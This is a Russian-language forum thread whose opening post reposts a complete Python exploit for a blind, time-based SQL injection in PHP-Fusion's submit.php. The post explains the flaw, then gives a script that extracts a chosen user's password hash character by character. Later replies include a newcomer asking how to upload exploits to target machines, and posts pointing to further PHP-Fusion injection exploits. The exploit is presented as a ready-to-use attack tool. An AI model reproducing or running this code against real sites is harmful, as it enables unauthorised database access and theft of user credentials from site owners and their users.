Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor


[ Уязвимости PHP-Fusion ]


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 7

#1
aka PSIH

aka PSIH

    ~~~

  • Extended
  • PipPip
  • 238 сообщений
PHP-Fusion 6.00.307                                      
And Probably All Other Versions                                
Blind Sql Injection Vulnerability                              
Benchmark Method    


exp:
#!/usr/bin/python
"""
#=================================================================================================#
#					 ____			__________		 __			 ____  __				  #
#					/_   | ____	 |__\_____  \  _____/  |_		  /_   |/  |_				#
#					 |   |/	\	|  | _(__  <_/ ___\   __\  ______  |   \   __\			   #
#					 |   |   |  \   |  |/	   \  \___|  |   /_____/  |   ||  |				 #
#					 |___|___|  /\__|  /______  /\___  >__|			|___||__|				 #
#							  \/\______|	  \/	 \/										  #
#=================================================================================================#
#									 This was a priv8 Exploit									#
#=================================================================================================#
#				 				 PHP-Fusion 6.00.307									  #
#								  And Probably All Other Versions								#
#								 Blind Sql Injection Vulnerability							   #
#										 Benchmark Method										#
#====================================#===========#====================================#===========#
# Server Configuration Requirements  #		   # Some Information				   #		   #
#====================================#		 #====================================#		   #
#												#												#
# magic_quotes_gpc = 0						   #  Vendor:   php-fusion.co.uk					#
#												#  Author:   The:Paradox						 #
#================================================#  Severity: Moderately Critical				 #
#												#												#
#	   Oh wow no-content space! Enjoy it!	   #  Proud To Be Italian.						  #
#												#												#
#====================================#===========#================================================#
# Proof Of Concept / Bug Explanation #															#
#====================================#															#
# PHP-Fusion presents a critical vulnerability in submit.php page. Let's see source:   		  #
#=================================================================================================#

[Submit.php]

 1. if ($stype == "l") {																		  
 2.												  
 3.	if (isset($_POST['submit_link'])) {							  
 4.
 5.	if ($_POST['link_name'] != "" && $_POST['link_url'] != "" && $_POST['link_description'] != "") {
 6.		$submit_info['link_category'] = stripinput($_POST['link_category']);
 7.		$submit_info['link_name'] = stripinput($_POST['link_name']);
 8.		$submit_info['link_url'] = stripinput($_POST['link_url']);
 9.		$submit_info['link_description'] = stripinput($_POST['link_description']);
10.		$result = dbquery("INSERT INTO ".$db_prefix."submissions (submit_type, submit_user, submit_datestamp, submit_criteria) VALUES ('l', '".$userdata['user_id']."', '".time()."', '".serialize($submit_info)."')");											  
												  
#=================================================================================================#
# Look to the sql query.																		  #
# There are two variables: $userdata['user_id'] and a serialized array $submit_info.			  #
# The user_id is an intval value and array values link_category, link_name, link_url and		  #
# link_description are correctly cleaned via fusions' stripinput() function.					  #
#																								 #
# All seems pretty cleaned.																	   #
# But what would happen if we set another value into submit_info[] array via gpc vars?			#
# It will be set in the serialized array, and obvious it will not checked by stripinput.		  #
# Sql Injection possibility!																	  #
#																								 #
# Let's see:																					  #
#																								 #
# Host: 127.0.0.1																				 #
# POST PHP-Fusion/submit.php?stype=l															  #
# link_category=1 link_name=1 link_url=1 link_description=1 submit_info[paradox]=' submit_link=1  #
#																								 #
# It will result in sql error in case of Mq = 0 :												 #
#																								 #
# You have an error in your SQL syntax; check [...]											   #
#																								 #
#=================================================================================================#
# Normally to make this trick working register_globals = 1 is needed, but in php-fusion uses	  #
# extract() to simulate register_globals when it is set to 0.									 #
#=================================================================================================#
# Use this at your own risk. You are responsible for your own deeds.							  #
#=================================================================================================#
#									  Python Exploit Starts									  #
#=================================================================================================#
"""

from httplib import HTTPConnection
from urllib import urlencode
from time import time
from sys import exit, argv, stdout
from md5 import new

print """
#=================================================================#
#					  PHP-Fusion v6.00.307					  #
#				  And Probably All Other Versions				#
#				 Blind Sql Injection Vulnerability			   #
#						 Benchmark Method						#
#																 #
#					 Discovered By The:Paradox				   #
#																 #
# Usage:														  #
#  ./fusiown [Target] [Path] [ValidId] [ValidPass] [TargetUserid] #
#																 #
# Example:														#
#  ./fusiown localhost /phpfusion/ 40 s3cr3t 1					#
#  ./fusiown www.host.org / 791 myp4ssw0rd 1					  #
#=================================================================#
"""

if len(argv)<=5:	exit()
else:   print "[.]Exploit Starting."

prefix = "fusion_" 
benchmark = "230000000" 
vtime = 6 
port = 80

target = argv[1]
path = argv[2]
cuid = argv[3]
cpass = argv[4]
uid = argv[5]

j=1
h4sh = ""
ht = []

for k in range(48,58):  
	ht.append(k)
for k in range(97,103): 
	ht.append(k)
ht.append(0)

def calc_md5(p):
	
	hash = new()
	hash.update(p)
	return hash.hexdigest()


print "[.]Blind Sql Injection Starts.\n\nHash:"
while j <= 32:
	for i in ht:
		if i == 0:	exit('[-]Exploit Failed.\n')
		
		start = time()
		conn = HTTPConnection(target,port)

		inj = "' OR (SELECT IF((ASCII(SUBSTRING(user_password," + str(j) + ",1))=" + str(i) + "),benchmark(" + benchmark + ",CHAR(0)),0) FROM " + prefix + "users WHERE user_id=" + uid + "))# BH > WH"

		conn.request("POST", path + "submit.php?stype=l", urlencode({'link_category': '1', 'link_name': '1', 'link_url': '1', 'link_description': '1', 'submit_link' : 'Submit+Link', 'submit_info[cGd0MQ==]' :  inj }), {"Accept": "text/plain", "Content-Type" : "application/x-www-form-urlencoded","Cookie": "fusion_user=" + cuid + "." + calc_md5(cpass) + ";"})
		response = conn.getresponse()
		read = response.read()		


		if response.status == 404: exit('[-]Error 404. Not Found.')		
		now = time()
		
		if now - start > vtime:
			stdout.write(chr(i))
			stdout.flush()
			h4sh += chr(i)
			j += 1
			break;

print "\n\n[+]All Done.\n-=Paradox Got This One=-"

©milw0rm.com
Everything that was made by human is possible to crack => ideal protection does not exist
*********
icq:162295
*********

#2
Zakladka

Zakladka

    Бит

  • Members
  • 21 сообщений
както хз.. описание надо было развёрнутее

#3
FreeCat

FreeCat

    Invisible Admin

  • root
  • PipPipPipPipPip
  • 1236 сообщений
Zakladka
Дык это инструмент не для начинающих)))).

#4
Glicryn_FT-1

Glicryn_FT-1

    Бит

  • Members
  • 9 сообщений
блин народ помогите навичку... вот все понимаю эксплойты чтотакое наю и скрипты тожэ наю а вот как их заливать на атакуемую машину хз..  ... я все изрыл в нэте, хотя мошт я и тупой невижу того что мне нужно... вообщем помогите плз или дайте ссылку где описано именно заливание скриптов и слойтов, заранее спс

#5
FreeCat

FreeCat

    Invisible Admin

  • root
  • PipPipPipPipPip
  • 1236 сообщений
Glicryn_FT-1
Телепаты все в отпуске) ... хоть куда заливка то будет))???

#6
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit

Ссылки из под хайдов не выдаю!


#7
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений

Ссылки из под хайдов не выдаю!


#8
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
PHP-Fusion Mod Book Panel (course_id) SQL Injection Vulnerability

Ссылки из под хайдов не выдаю!



Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных